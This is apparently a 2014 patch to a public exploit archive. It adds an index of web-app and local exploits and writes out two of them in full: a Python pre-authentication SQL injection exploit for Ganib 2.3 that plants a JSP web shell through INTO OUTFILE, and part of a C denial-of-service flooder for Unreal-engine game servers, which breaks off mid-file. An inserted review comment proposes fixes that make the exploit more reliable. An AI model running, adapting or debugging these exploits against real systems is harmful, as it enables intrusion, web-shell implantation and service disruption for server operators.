From f21446479d5db7582fe572e6b676c9ee62f933d6 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 7 Mar 2014 04:28:39 +0000 Subject: [PATCH] Updated 03_07_2014 --- files.csv | 22 + platforms/jsp/webapps/31874.py | 71 ++ platforms/multiple/dos/32086.c | 1125 +++++++++++++++++++++++++++ platforms/multiple/remote/32084.txt | 13 + platforms/php/webapps/31989.txt | 26 + platforms/php/webapps/32075.txt | 71 ++ platforms/php/webapps/32076.txt | 64 ++ platforms/php/webapps/32077.txt | 9 + platforms/php/webapps/32078.php | 41 + platforms/php/webapps/32079.txt | 9 + platforms/php/webapps/32080.txt | 9 + platforms/php/webapps/32081.txt | 9 + platforms/php/webapps/32082.txt | 9 + platforms/php/webapps/32083.txt | 9 + platforms/php/webapps/32085.txt | 9 + platforms/php/webapps/32087.txt | 9 + platforms/php/webapps/32088.pl | 210 +++++ platforms/php/webapps/32089.pl | 203 +++++ platforms/php/webapps/32090.txt | 7 + platforms/php/webapps/32091.txt | 12 + platforms/php/webapps/32092.txt | 9 + platforms/php/webapps/32093.txt | 8 + platforms/windows/local/32074.rb | 107 +++ 23 files changed, 2061 insertions(+) create mode 100755 platforms/jsp/webapps/31874.py create mode 100755 platforms/multiple/dos/32086.c create mode 100755 platforms/multiple/remote/32084.txt create mode 100755 platforms/php/webapps/31989.txt create mode 100755 platforms/php/webapps/32075.txt create mode 100755 platforms/php/webapps/32076.txt create mode 100755 platforms/php/webapps/32077.txt create mode 100755 platforms/php/webapps/32078.php create mode 100755 platforms/php/webapps/32079.txt create mode 100755 platforms/php/webapps/32080.txt create mode 100755 platforms/php/webapps/32081.txt create mode 100755 platforms/php/webapps/32082.txt create mode 100755 platforms/php/webapps/32083.txt create mode 100755 platforms/php/webapps/32085.txt create mode 100755 platforms/php/webapps/32087.txt create mode 100755 platforms/php/webapps/32088.pl create mode 100755 platforms/php/webapps/32089.pl create mode 100755 platforms/php/webapps/32090.txt create mode 100755 
platforms/php/webapps/32091.txt
 create mode 100755 platforms/php/webapps/32092.txt
 create mode 100755 platforms/php/webapps/32093.txt
 create mode 100755 platforms/windows/local/32074.rb
diff --git a/files.csv b/files.csv
index dcdd39382..7d8726e64 100755
--- a/files.csv
+++ b/files.csv
@@ -28665,6 +28665,7 @@ id,file,description,date,author,platform,type,port
 31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0
 31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - (.PNM File) Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0
 31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0
+31874,platforms/jsp/webapps/31874.py,"Ganib Project Management 2.3 - SQL Injection",2014-02-24,drone,jsp,webapps,80
 31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,Sha0,linux,remote,0
 31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
 31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0
@@ -28774,6 +28775,7 @@ id,file,description,date,author,platform,type,port
 31986,platforms/php/webapps/31986.txt,"Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80
 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80
 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
+31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80
 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
 31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0
 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0
@@ -28850,3 +28852,23 @@ id,file,description,date,author,platform,type,port
 32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 wiki/wiki.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0
 32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 work/work.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0
 32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 claroline/redirector.php url Variable Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0
+32074,platforms/windows/local/32074.rb,"ALLPlayer M3U Buffer Overflow",2014-03-05,metasploit,windows,local,0
+32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80
+32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent XSS Vulnerability",2014-03-05,"High-Tech Bridge SA",php,webapps,80
+32077,platforms/php/webapps/32077.txt,"IBS 0.15 'username' Parameter Cross Site Scripting Vulnerability",2008-07-17,Cyb3r-1sT,php,webapps,0
+32078,platforms/php/webapps/32078.php,"Community CMS 0.1 'include.php' Remote File Include Vulnerability",2008-07-17,N3TR00T3R,php,webapps,0
+32079,platforms/php/webapps/32079.txt,"CreaCMS edition_article/edition_article.php cfg[document_uri] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0
+32080,platforms/php/webapps/32080.txt,"CreaCMS fonctions/get_liste_langue.php cfg[base_uri_admin] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0
+32081,platforms/php/webapps/32081.txt,"Lemon CMS 1.10 'browser.php' Local File Include Vulnerability",2008-07-18,Ciph3r,php,webapps,0
+32082,platforms/php/webapps/32082.txt,"Def_Blog 1.0.3 comaddok.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0
+32083,platforms/php/webapps/32083.txt,"Def_Blog 1.0.3 comlook.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0
+32084,platforms/multiple/remote/32084.txt,"SmbClientParser 2.7 Perl Module Remote Command Execution Vulnerability",2008-07-18,"Jesus Olmos Gonzalez",multiple,remote,0
+32085,platforms/php/webapps/32085.txt,"phpFreeChat 1.1 'demo21_with_hardocded_urls.php' Cross Site Scripting Vulnerability",2008-07-18,ahmadbady,php,webapps,0
+32086,platforms/multiple/dos/32086.c,"SWAT 4 Multiple Denial Of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",multiple,dos,0
+32087,platforms/php/webapps/32087.txt,"EasyBookMarker 4.0 'ajaxp_backend.php' Cross-Site Scripting Vulnerability",2008-07-21,Dr.Crash,php,webapps,0
+32088,platforms/php/webapps/32088.pl,"EasyDynamicPages 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0
+32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 'read' Parameter Multiple SQL Injection and Cross-Site Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0
+32090,platforms/php/webapps/32090.txt,"Maran PHP Blog 'comments.php' Cross-Site Scripting Vulnerability",2008-07-21,Dr.Crash,php,webapps,0
+32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0
+32092,platforms/php/webapps/32092.txt,"Flip 3.0 'config.php' Remote File Include Vulnerability",2008-07-21,Cru3l.b0y,php,webapps,0
+32093,platforms/php/webapps/32093.txt,"phpKF 'forum_duzen.php' SQL Injection Vulnerability",2008-07-21,U238,php,webapps,0
diff --git a/platforms/jsp/webapps/31874.py b/platforms/jsp/webapps/31874.py
new file mode 100755
index 000000000..6ff7e6942
--- /dev/null
+++ b/platforms/jsp/webapps/31874.py
@@ -0,0 +1,71 @@
+# Exploit title: Ganib 2.x SQLi
+# Date: 02/02/2014
+# Exploit author: drone (@dronesec)
+# More information: http://forelsec.blogspot.com/2014/02/ganib-project-management-23-multiple.html
+# Vendor homepage: http://www.ganib.com/
+# Software link: http://downloads.sourceforge.net/project/ganib/Ganib-2.0/Ganib-2.0_with_jre.zip
+# Version: <= 2.3
+# Fixed in: 2.4
+# Tested on: Ubuntu 12.04 (apparmor disabled) / WinXP SP3
+
+from argparse import ArgumentParser
+import sys
+import string
+import random
+import requests
+
+""" Ganib 2.0 preauth SQLi PoC
+ @dronesec
+"""
+
+def loadJSP(options):
+ data = ''
+
+ try:
+ with open(options.jsp) as f:
+ for line in f.readlines():
+ data += line.replace("\"", "\\\"").replace('\n', '')
+ except Exception, e:
+ print e
+ sys.exit(1)
+
+ return data
+
+def run(options):
+ print '[!] Dropping %s on %s...' % (options.jsp, options.ip)
+
+ url = "http://{0}:8080/LoginProcessing.jsp".format(options.ip)
+ shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))
+
+ exploit = '1 UNION SELECT "{0}","1","2","3" INTO OUTFILE "{1}"'
+ exploit = exploit.format(loadJSP(options), options.path + '/%s.jsp' % shell)
+
+ data = { "theAction" : "submit",
+ "J_USERNAME" : "test",
+ "J_PASSWORD" : "test",
+ "language" : "en",
+ "remember_checkbox" : "on",
+ "userDomain" : exploit
+ }
+
+ res = requests.post(url, data=data)
+ if res.status_code is 200:
+ print '[!] Dropped at /{0}.jsp'.format(shell)
+ else:
+ print '[!] Failed to drop JSP (HTTP {0})'.format(res.status_code)
+
+
+def parse():
+ parser = ArgumentParser()
+ parser.add_argument("-i", help='Server ip address', action='store', dest='ip',
+ required=True)
+ parser.add_argument("-p", help='Writable web path (/var/www/ganib)', dest='path',
+ action='store', default='/var/www/ganib')
+ parser.add_argument("-j", help="JSP to deploy", dest='jsp', action='store')
+
+ options = parser.parse_args()
+ options.path = options.path if options.path[-1] != '/' else options.path[:-1]
+ return options
+
+if __name__ == "__main__":
+ run(parse())
\ No newline at end of file
diff --git a/platforms/multiple/dos/32086.c b/platforms/multiple/dos/32086.c
new file mode 100755
index 000000000..5a43e6eed
--- /dev/null
+++ b/platforms/multiple/dos/32086.c
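Review bot: `if res.status_code is 200:` in run() tests object identity rather than numeric equality and only happens to work because CPython caches small integers; the portable form is `if res.status_code == 200:`. The `-j` option in parse() is not marked `required=True`, so omitting it makes loadJSP() call `open(None)` and the broad `except Exception, e:` reports a TypeError instead of a usage error; `parser.add_argument("-j", help="JSP to deploy", dest='jsp', action='store', required=True)` gives the proper argparse message. The `except Exception, e:` and `print` statement syntax also pin the file to Python 2, which the header does not state; a `# Requires: Python 2.x, requests` line next to `# Tested on:` would make that explicit. The header could likewise record the server-side conditions the `INTO OUTFILE` write depends on (a database account holding the FILE privilege, `secure_file_priv` not restricting the target directory, and a web root writable by the database process), since those are also the controls whose absence the "Tested on ... (apparmor disabled)" line hints at and whose presence blocks this PoC.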
@@ -0,0 +1,1125 @@ +source: http://www.securityfocus.com/bid/30299/info + +SWAT 4 is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle certain input. + +An attacker may exploit these issues to crash the affected application, denying service to legitimate users. + +SWAT 4 1.1 is vulnerable; other versions may also be affected. + +/* + Copyright 2008 Luigi Auriemma + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + + http://www.gnu.org/licenses/gpl.txt +*/ + +#include +#include +#include +#include +#include +#include +#include +#include "rwbits.h" + +#ifdef WIN32 + #include + #include "winerr.h" + + #define close closesocket + #define sleep Sleep + #define ONESEC 1000 +#else + #include + #include + #include + #include + #include + #include + + #define ONESEC 1 + #define stristr strcasestr +#endif + +typedef uint8_t u8; +typedef uint16_t u16; +typedef uint32_t u32; + + + +#define VER "0.1.1" +#define PORT 7777 +#define BUFFSZ 4096 // the max supported is 576 +#define HELLBELL "BADBOY " \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + 
"\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" + +#define UT2_QUERY "\x79\x00\x00\x00\x00" // not used +#define GS1_QUERY "\\info\\" // \status\ returns 3 packets, I'm too lazy to handle all of them +#define GS2_QUERY "\xfe\xfd\x00" "\x00\x00\x00\x00" "\xff\x00\x00" "\x00" +#define GS3_QUERY "\xfe\xfd\x09" "\x00\x00\x00\x00" +#define GS3_QUERYX "\xfe\xfd\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\xff\x00\x00" "\x00" + + + +void fake_players_socket(int sd) { // simple to add function for not closing sockets + #define MAXFAKESOCKS 64 + static int socks[MAXFAKESOCKS], + socksp, + init = 1; + int i; + + if(init || (sd < 0)) { + for(i = 0; i < MAXFAKESOCKS; i++) socks[i] = -1; + socksp = 0; + init = 0; + return; + } + if(socksp >= MAXFAKESOCKS) socksp = 0; + if(socks[socksp] >= 0) close(socks[socksp]); + socks[socksp] = sd; + socksp++; +} +void activate_fix(int *fix); +int unreal_send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int *chall, u8 **errmsg); +u8 *rndhash(int size); +int unreal_info(u8 *buff, struct sockaddr_in *peer); +int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...); +void fgetz(u8 *data, int len); +int calc_authresp(int num); +int write_unrnum(int num, u8 *buff, int bits); +int read_unrnum(int *num, u8 *buff, int bits); +int write_unrser(int num, u8 *buff, int bits, int max); +u8 *unreal_parse_pck(u8 *buff, int size, int *chall); +int unreal_build_pck(u8 *buff, int pck, ...); +int read_unreal_index(u8 *index_num, int *ret); +int write_unreal_index(int number, u8 *index_num); +int read_bitmem(u8 *in, int inlen, u8 *out, int bits); +int write_bitmem(u8 *in, int inlen, u8 *out, int bits); +int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct 
sockaddr_in *peer, int err); +int timeout(int sock, int secs); +u32 resolv(char *host); +void std_err(void); + + + +int aafix = 0, // America's Army uses 0x800 instead of 0x3ff + u3fix = 0, // Unreal 3 no longer uses index numbers + rvfix = 0, // RavenShiel uses 0x50f instead of 0x3ff (this is useless since it's enough compatible with AA) + pariahfix = 0, // Pariah + movfix = 0, // Men of Valor + //khgfix = 0, // Klingon Honor Guard uses readbits 16 1 9 16 3 and 12 instead of index numbers + // unreal1fix, similar to above... not needed to support at the moment + verbose = 0, + challenge_fix = 0, + hex_challenge = 0, + force_team = 0, + force_fix = 0, + send_verbose = 0, + fast_connect = 1, + first_time = 1; +u8 *gamestatefix[] = { + "", // none + // the order of the hash of GAMESTATE checked in memory is 77778888555566661111222233334444 + //the second part of the GAMESTATE hash is the MD5 of "SCR3W3DD@P00CH" and the MD5 of the file (for example SwatGame.u) + // Swat4 requires 32 successful GAMESTATEs, it's enough to send the same one 32 times, + // but at the moment my tool doesn't support the sending of more packets + "GAMESTATE FA1F998D4D4C2E5F492B79FF1D58488E5e2b7c57161e65909c8c7b01923aa4c4", // UT2XMP demo + "GAMESTATE 520996A03FACE2BE4FF9A24F17158B3B7c07dc2b72044ef0e6278707e9e8b0f6", // UT2003 + // "GAMESTATE D2ECC882E8945E68413DDF3DCB7A1BBEfe95745de189869e61331593a64f33de", // SWAT4 + NULL + }; + + + +int main(int argc, char *argv[]) { + struct sockaddr_in peer, + peerl; + int i, + sd, + len, + pck, + ver, + chall, + onlyone = 0, + infoquery = 1, + sendauth = 0, + gamestatefixes = 0, + random_username = 0, + force_closesock = 0; + u16 port = PORT; + u8 buff[BUFFSZ], + hello[BUFFSZ] = "", + auth[BUFFSZ] = "", + login[BUFFSZ] = "", + hellover[64] = "", + pass[64] = "", + tmpchall[12], + *cmd_only = NULL, + *cmd_plus = "", + *login_plus = "", + *errmsg, + *host, + *p; + +#ifdef WIN32 + WSADATA wsadata; + WSAStartup(MAKEWORD(1,0), &wsadata); +#endif + + 
setbuf(stdout, NULL); + + fputs("\n" + "Unreal engine basic client and Fake Players DoS "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 3) { + printf("\n" + "Usage: %s [options] \n" + "\n" + "Options:\n" + "-c \"C\" send only the custom command C\n" + "-C \"C\" send the custom command C plus the others needed to join\n" + "-l \"S\" add a custom URL string S to the LOGIN command, for example:\n" + " -l \"Index.ut2?Name=player?Class=EnginePawn?Character=Jakob?team=1\"\n" + " -l \"?Name=player?UserName=UserName?MAC=\"\n" + //" -l \"Entry.aao?Name=Recruit?Class=AGP_Characters.AGP_Character?team=255?UserName=UserName?MAC=\"\n" + "-f use the full method (HELLO + LOGIN and so on), needed with some games\n" + " of the Unreal 1 engine to avoid the crash of the server\n" + //"-u send a LOGIN command with a random UserName field (for America's Army)\n" AUTOMATIC!!! + //"-a send the AUTH command\n" AUTOMATIC!!! + "-i do not query the server for informations and for hostport\n" + "-b Windows dedicated server hell bell attack through the BADBOY command\n" + "-v verbose mode, show all the commands received from the server\n" + "-V show all the commands sent by this tool\n" + "-1 only one fake player, debug\n" + "-x N force the activation of a specific compatibility fix, where N is for:\n" + " 1 = America's Army 2 = Unreal 3 engine 3 = Raven Shield\n" + " 4 = Pariah 5 = Men of Valor\n" + "\n" + "works also with servers protected by password without knowing the keyword!\n" + "should work with almost any game based on the Unreal engine (1, 2 and 3)\n" + "\n", argv[0]); + exit(1); + } + + argc -= 2; + for(i = 1; i < argc; i++) { + if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2)) { + printf("\nError: wrong argument (%s)\n", argv[i]); + exit(1); + } + switch(argv[i][1]) { + case 'v': { + verbose = 1; + break; + } + case 'V': { + send_verbose = 1; + break; + } + case 'f': { + fast_connect 
= 0; + break; + } + case 'c': { + cmd_only = argv[++i]; + break; + } + case 'C': { + cmd_plus = argv[++i]; + break; + } + case 'l': { + login_plus = argv[++i]; + fast_connect = 0; + break; + } + case '1': { + onlyone = 1; + break; + } + case 'i': { + infoquery = 0; + break; + } + case 'a': { + sendauth = 1; + break; + } + case 'b': { + cmd_only = HELLBELL; + force_closesock = 1; + break; + } + case 'u': { + random_username = 1; + fast_connect = 0; + break; + } + case 'x': { + force_fix = atoi(argv[++i]); + break; + } + default: { + printf("\nError: wrong argument (%s)\n", argv[i]); + exit(1); + } + } + } + + host = argv[argc]; + port = atoi(argv[argc + 1]); + + peer.sin_addr.s_addr = resolv(host); + peer.sin_port = htons(port); + peer.sin_family = AF_INET; + + peerl.sin_addr.s_addr = INADDR_ANY; + peerl.sin_port = htons(time(NULL)); + peerl.sin_family = AF_INET; + + printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port)); + + if(infoquery && (ntohs(peer.sin_port) != 7777)) { + ver = unreal_info(buff, &peer); + if(ver) sprintf(hellover, "MINVER=%d VER=%d", ver, ver); + } + + /* full list of parameters and values parsed by various games which use the Unreal engine + USERFLAG (number) + HELLO + MINVER= + VER= + AUTH + HASH= + RESPONSE= + USERNAME= + PASSWORD= + GM= + NETSPEED (number >= 1800) + HAVE + GUID= + GEN= + SKIP + GUID= + LOGIN + RESPONSE= + URL= + JOIN + BADBOY (followed by the string visualized in the console) + PETE + PKT= + PKG= + REPEAT + OPENVOICE (number) + // UT2003 + CRITOBJCNT (number, similar to PETE) + GAMESTATE (ID) + NAME= + // SWAT4 + GAMESPYRESPONSE + RS= + GAMESPYSTATRESPONSE + PID= + RS= + VERIFYCONTENT + FILE= + MD5= + GAMECONFIGCOUNT (number) + GAMECONFIG + CONFIGFILE= + CONFIGMD5= + // Warpath and Pariah + JOINSPLIT + GAMEPAD= + GUESTNUM= + DISABLESPLIT + GAMEPAD= + EPIC (hash) + // Raven Shield + SERVERPING + ARMPATCH + // UT3 + DEBUG + ABORT + GUID= + JOINSPLIT + */ + // generic in-game commands: open namecount 
start map servertravel say disconnect + + printf("\n- start attack:\n"); + + if(force_fix) { + sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if(sd < 0) std_err(); + errmsg = unreal_parse_pck("\0\0", 0, NULL); + goto handle_error_message; + } + + for(;;) { + pck = 0; + printf("\n Player: "); + + sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if(sd < 0) std_err(); + do { + peerl.sin_port++; + } while(bind(sd, (struct sockaddr *)&peerl, sizeof(struct sockaddr_in)) < 0); + + if(!fast_connect || u3fix || movfix) { // Unreal 3 requires the LOGIN packet, while MOV crashes! + sprintf(hello, "HELLO %sREVISION=0 %s", u3fix ? "P=1 " : "", hellover); + + len = unreal_build_pck(buff, pck++, + hello, + NULL); + + len = unreal_send_recv(sd, buff, len, buff, BUFFSZ, &peer, &chall, &errmsg); + if(len < 0) goto handle_error_message; + + //sprintf(login, "LOGIN RESPONSE=%i URL=Index.ut2?Name=player?Class=EnginePawn?Character=Jakob?team=1%s%s", chall, pass[0] ? "?password=" : "", pass); + sprintf(tmpchall, hex_challenge ? "%08X" : "%i", chall); // I don't know if this is right, seems that U3 doesn't check the challenge! + sprintf(login, "LOGIN RESPONSE=%s URL=%s%s%s%s", tmpchall, login_plus, force_team ? "?Team=1" : "", pass[0] ? "?password=" : "", pass); + if(random_username) sprintf(login + strlen(login), "?UserName=%s", rndhash(5)); + } + + if(sendauth) { + sprintf(auth, "AUTH HASH=%s GM=%s USERNAME=%s PASSWORD=%s", rndhash(16), rndhash(66), rndhash(4), rndhash(16)); + } + + if(cmd_only) { + len = unreal_build_pck(buff, pck++, + cmd_only, + NULL); + } else { + len = unreal_build_pck(buff, pck++, + auth, // causes only problems! 
+ login, + //"NETSPEED 1800", // useless + "PETE PKT=1 PKG=1", + "REPEAT", + "CRITOBJCNT 1", + gamestatefix[gamestatefixes], + cmd_plus, + "JOIN", + NULL); + } + if(len > BUFFSZ) { + printf("\nError: your packet is too big\n"); + exit(1); + } + len = unreal_send_recv(sd, buff, len, buff, BUFFSZ, &peer, NULL, &errmsg); + if(len < 0) goto handle_error_message; + + if(onlyone) { + if(verbose) { + for(;;) { // show any other incoming message + len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 0); + if(len < 60) break; // break if too small + errmsg = unreal_parse_pck(buff, len, NULL); + if(errmsg) break; + } + } + printf("\n- done\n"); + exit(1); + } + + if(force_closesock) { + close(sd); + } else { + fake_players_socket(sd); + } + continue; + +handle_error_message: + close(sd); + if(!errmsg) continue; + if(strstr(errmsg, "UPGRADE")) { + p = strstr(errmsg, "MINVER"); // UPGRADE MINVER= VER= + if(!p) exit(1); + strncpy(hellover, p, sizeof(hellover)); + hellover[sizeof(hellover) - 1] = 0; + } else if(strstr(errmsg, "SERVERFULL") || stristr(errmsg, "capacity") || stristr(errmsg, "MaxedOutMessage") || stristr(errmsg, "players")) { + printf(" server full "); + for(i = 3; i; i--) { + printf("%d\b", i); + sleep(ONESEC); + } + } else if(strstr(errmsg, "NEEDPW") || strstr(errmsg, "WRONGPW") || stristr(errmsg, "password") || stristr(errmsg, "PassWd")) { + printf("\n- server is protected with password, insert the keyword: "); + fgetz(pass, sizeof(pass)); + } else if(strstr(errmsg, "BRAWL")) { + gamestatefixes++; + if(!gamestatefix[gamestatefixes]) { + printf("\nError: this game needs one or more GAMESTATE commands not implemented\n"); + exit(1); + } + printf("\n- %s", gamestatefix[gamestatefixes]); + } else if(stristr(errmsg, "Username")) { + if(random_username) exit(1); + printf("\n- activate random UserName in the LOGIN command"); + random_username = 1; + fast_connect = 0; + } else if(stristr(errmsg, "Could not find team")) { + if(force_team) exit(1); + printf("\n- activate 
team fix"); + force_team = 1; + fast_connect = 0; + } else if(stristr(errmsg, "stats")) { + if(sendauth) exit(1); + sendauth = 1; + } else if(stristr(errmsg, "CHALLENGE")) { + challenge_fix++; + if(challenge_fix == 1) { + printf("\n- activate the Frontline Fuel of War challenge fix"); + } else if(!hex_challenge) { + printf("\n- activate the hexadecimal challenge fix"); + challenge_fix = 0; + hex_challenge = 1; + } else { + printf("\n" + "Error: seems that this game requires a specific challenge-response algorithm\n" + "\n"); + exit(1); + } + } else if(!strcmp(errmsg, "NOFIX")) { + printf("\n- activate full connect without compatibility fixes"); + activate_fix(NULL); + } else if(!strcmp(errmsg, "AAFIX")) { + printf("\n- activate the America's Army compatibility"); + activate_fix(&aafix); + } else if(!strcmp(errmsg, "U3FIX")) { + printf("\n- activate the Unreal 3 engine compatibility"); + activate_fix(&u3fix); + } else if(!strcmp(errmsg, "RVFIX")) { + printf("\n- activate the Raven Shield compatibility"); + activate_fix(&rvfix); + } else if(!strcmp(errmsg, "PARIAHFIX")) { + printf("\n- activate the Pariah/Warpath compatibility"); + activate_fix(&pariahfix); + } else if(!strcmp(errmsg, "MOVFIX")) { + printf("\n- activate the Men of Valor compatibility"); + activate_fix(&movfix); + } else { + printf("\nError: %s\n", errmsg); + exit(1); + } + } + return(0); +} + + + +void activate_fix(int *fix) { + aafix = 0; + u3fix = 0; + rvfix = 0; + pariahfix = 0; + movfix = 0; + if(fix) *fix = 1; +} + + + +int unreal_send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int *chall, u8 **errmsg) { + int len; + + len = send_recv(sd, in, insz, out, outsz, peer, first_time); + if(len < 0) { + if(len == -1) std_err(); + printf(" players_per_IP limit or timed out "); + sleep(ONESEC); + *errmsg = NULL; + return(-1); + } + if(first_time) first_time = 0; + +#ifdef DUMPPCK + static int num = 0; + FILE *fd; + char fname[64]; + sprintf(fname, "unrealfp_pck.%03d", 
num++); + fd = fopen(fname, "wb"); + if(!fd) std_err(); + fwrite(out, 1, len, fd); + fclose(fd); +#endif + + *errmsg = unreal_parse_pck(out, len, chall); + if(*errmsg) return(-1); + return(len); +} + + + +u8 *rndhash(int size) { + static u32 rnd = 0; + static int sel = 0; + static u8 out[4][256]; + static const u8 hex[16] = "0123456789abcdef"; + int i; + u8 *ret, + *p; + + if(!rnd) rnd = ~time(NULL); + + ret = out[sel++ & 3]; + p = ret; + for(i = 0; i < size; i++) { + rnd = (rnd * 0x343FD) + 0x269EC3; + *p++ = hex[(rnd & 0xff) >> 4]; + *p++ = hex[(rnd & 0xff) & 15]; + } + *p = 0; + return(ret); +} + + + +int unreal_info(u8 *buff, struct sockaddr_in *peer) { + u32 chall; + int sd, + len, + type, + retver = 0; + u8 gs3[32], + *gamever = NULL, + *hostport = NULL; + + sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if(sd < 0) std_err(); + + printf("\n- send info queries\n"); + send_recv(sd, GS1_QUERY, sizeof(GS1_QUERY) - 1, NULL, 0, peer, 0); + send_recv(sd, GS2_QUERY, sizeof(GS2_QUERY) - 1, NULL, 0, peer, 0); + send_recv(sd, GS3_QUERY, sizeof(GS3_QUERY) - 1, NULL, 0, peer, 0); + len = send_recv(sd, NULL, 0, buff, BUFFSZ, peer, 0); + if(len < 0) goto quit; + if(buff[0] == '\\') { + type = 1; + } else { + if(len < 8) { + type = 2; + len = send_recv(sd, NULL, 0, buff, BUFFSZ, peer, 0); + if(len < 0) goto quit; + } else { + type = 3; + memcpy(gs3, GS3_QUERYX, sizeof(GS3_QUERYX) - 1); + chall = atoi(buff + 5); + gs3[7] = chall >> 24; + gs3[8] = chall >> 16; + gs3[9] = chall >> 8; + gs3[10] = chall; + len = send_recv(sd, gs3, sizeof(GS3_QUERYX) - 1, buff, BUFFSZ, peer, 0); + if(len < 0) goto quit; + } + } + + printf("\n- handle reply:\n"); + gs_handle_info(buff, len, + (type == 1) ? 1 : 0, (type == 1) ? '\\' : '\0', (type == 1) ? 
